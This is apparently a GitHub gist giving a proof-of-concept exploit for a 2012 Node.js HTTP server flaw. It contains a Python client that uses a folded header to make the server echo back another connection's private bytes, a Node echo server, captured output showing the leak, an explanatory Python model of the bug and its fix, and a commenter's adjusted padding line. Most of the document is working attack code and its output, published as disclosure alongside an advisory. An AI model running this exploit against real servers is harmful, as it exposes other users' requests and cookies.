@isaacs
Created May 7, 2012 16:41
#!/usr/bin/env python
# stringptr-update-poc-client.py (Python 2: str is bytes, so sendall/recv work on str)
import socket
import sys
import time

def round_up(n, r):
    # round n up to the next multiple of r
    return int((n + r - 1) / r) * r

# Connection 1: a request whose last header, "X:", is left unfinished. The
# CRLF followed by a space is a folded (continuation) line, so the server
# keeps waiting for the rest of the header value.
s = socket.socket()
s.connect(("localhost", 8080))
buf = "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
s.sendall(buf)
time.sleep(0.1)

# Connection 2: data from a different client, read by the server while
# connection 1's header is still pending.
s2 = socket.socket()
s2.connect(("localhost", 8080))
buf2 = "This is private data, perhaps an HTTP request with a Cookie in it."
s2.sendall(buf2)
time.sleep(0.1)

# Finish the folded header on connection 1. The padding is computed from the
# two buffers' lengths rounded up to 16 so that the header value the vulnerable
# server builds reaches the bytes it received from connection 2; the server
# then echoes that value back, and we print the response.
s.sendall("A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + "\r\n\r\n")
while True:
    b = s.recv(1024)
    if not b:
        break
    sys.stdout.write(b)
#!/usr/bin/env node
// stringptr-update-poc-server.js: echoes the value of the request's "X" header
var http = require('http');
http.createServer(function (req, res) {
  res.writeHead(200, {'Content-Type': 'text/plain'});
  res.end('X header: ' + req.headers['x']);
}).listen(8080);
@isaacs (Author) commented May 7, 2012

See http://blog.nodejs.org/2012/05/07/http-server-security-vulnerability-please-upgrade-to-0-6-17/

$ ./node ~/stringptr-update-poc-server.js &
[1] 11801
$ ~/stringptr-update-poc-client.py
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Wed, 18 Apr 2012 00:05:11 GMT
Connection: close
Transfer-Encoding: chunked

64
X header:
 This is private data, perhaps an HTTP request with a Cookie in it.
0
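
The mechanism behind that output, as an added model in Python (my own code, not the gist's and not Node's): a toy request-head parser that reads every connection into one shared slab buffer and remembers a header value that is still open at the end of a read as an (offset, length) pair into that slab. The 16-byte-aligned slab, the bookkeeping and the fix (copy pending bytes out of the slab at the end of each read) are simplifying assumptions about the bug class, not Node's implementation. The two byte strings are the ones the gist's client sends.

```python
import re

# Added model (not from the gist or from Node.js). Assumptions: every socket
# read is copied into one shared slab at the next 16-byte boundary, and a
# header value still open at the end of a read is remembered as an
# (offset, length) pair pointing into that slab.

def round_up(n, r):
    return (n + r - 1) // r * r


class Slab:
    """Shared read buffer: each read lands at the next 16-byte boundary (assumption)."""
    def __init__(self, size=4096):
        self.mem = bytearray(size)
        self.top = 0

    def read_into(self, data):
        off = self.top
        self.mem[off:off + len(data)] = data
        self.top = round_up(off + len(data), 16)
        return off


class StringPtr:
    """A header value under construction, referenced by its position in the slab."""
    def __init__(self, slab, off):
        self.slab, self.off, self.n, self.saved = slab, off, 0, None

    def update(self, off, n):
        if self.saved is not None:
            self.saved += self.slab.mem[off:off + n]   # already owned: append a copy
        else:
            self.n += n   # BUG: assumes the new bytes sit right after the old ones in the slab

    def save(self):
        """The fix: copy the bytes seen so far out of the slab before it is reused."""
        if self.saved is None:
            self.saved = bytes(self.slab.mem[self.off:self.off + self.n])

    def value(self):
        if self.saved is not None:
            return bytes(self.saved)
        return bytes(self.slab.mem[self.off:self.off + self.n])   # whatever is there now


WSP = (b" ", b"\t")


class HeaderParser:
    """Toy HTTP/1.1 request-head parser; one instance serves every connection."""
    def __init__(self, fixed):
        self.fixed = fixed      # False: vulnerable pointer handling, True: save at end of read
        self.slab = Slab()
        self.conns = {}

    def feed(self, conn, data):
        """Deliver one TCP segment of `conn`; returns the headers once the head is complete."""
        st = self.conns.setdefault(conn, {"headers": {}, "field": None, "ptr": None, "reqline": False})
        base = self.slab.read_into(data)
        pos = 0
        if st["ptr"] is not None:                  # a folded header value is still open
            pos = self._scan_value(st, data, base, 0)
        while pos < len(data):
            end = data.find(b"\r\n", pos)
            if end < 0:
                break                              # incomplete line: wait for more data (not modelled)
            line, start, pos = data[pos:end], pos, end + 2
            if not st["reqline"]:
                st["reqline"] = True               # the request line itself is not parsed here
            elif line == b"":
                return dict(st["headers"])         # empty line: end of the request head
            else:
                field, sep, _ = line.partition(b":")
                if not sep:
                    raise ValueError("malformed header line")
                st["field"] = field.strip().lower()
                vstart = start + len(field) + 1    # first byte after the colon
                st["ptr"] = StringPtr(self.slab, base + vstart)
                pos = self._scan_value(st, data, base, vstart)
        if self.fixed and st["ptr"] is not None:
            st["ptr"].save()
        return None

    def _scan_value(self, st, data, base, start):
        """Consume value bytes from `start`. A CRLF ends the value unless SP/HTAB follows it
        (obs-fold); returns the position after the CRLF, or len(data) if the value is still open."""
        i = start
        while True:
            end = data.find(b"\r\n", i)
            if end < 0:                            # still open: continues in the next read
                st["ptr"].update(base + start, len(data) - start)
                return len(data)
            if end + 2 < len(data) and data[end + 2:end + 3] in WSP:
                i = end + 2                        # folded line belongs to the value
                continue
            st["ptr"].update(base + start, end - start)
            raw = st["ptr"].value()
            # a fold is equivalent to a single space (RFC 7230 section 3.2.4)
            st["headers"][st["field"]] = re.sub(rb"\r\n[ \t]+", b" ", raw).strip()
            st["field"] = st["ptr"] = None
            return end + 2


# The gist's buf and buf2 (buf2 stands in for another client's private data).
BUF = b"GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
BUF2 = b"This is private data, perhaps an HTTP request with a Cookie in it."


def run_poc(fixed):
    """Replay the gist's three segments against the toy server; returns the parsed X header."""
    srv = HeaderParser(fixed=fixed)
    srv.feed("conn1", BUF)      # header "X" left open on a folded line
    srv.feed("conn2", BUF2)     # another client's bytes are read into the slab meanwhile
    pad = 3 + round_up(len(BUF), 16) - len(BUF) + round_up(len(BUF2), 16)   # the gist's formula
    headers = srv.feed("conn1", b"A" * pad + b"\r\n\r\n")
    return headers[b"x"]


if __name__ == "__main__":
    print("vulnerable:", run_poc(fixed=False))
    print("fixed:     ", run_poc(fixed=True))
```

With `fixed=False` the X header comes back containing buf2 (plus slab padding), because the stale offset still points at the slab region that conn2's read has since been placed after; with `fixed=True` the pending "\r\n " was copied out before conn2 was read, so the value is just the 90 A's the client sent.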

@paradela commented

Hey, I was trying to reproduce the vulnerability, and I can't get the "private" data...

I tried a lot of versions from those that were marked as vulnerable, and I couldn't get the data as you did. Is there anything else that I need to know?

Ty in advance ;)

EDIT: I finally got it to work, but in line 24 of stringptr-update-poc-client.py I needed to change it to:
s.sendall("A" * (3 + len(buf2)) + "\r\n\r\n")
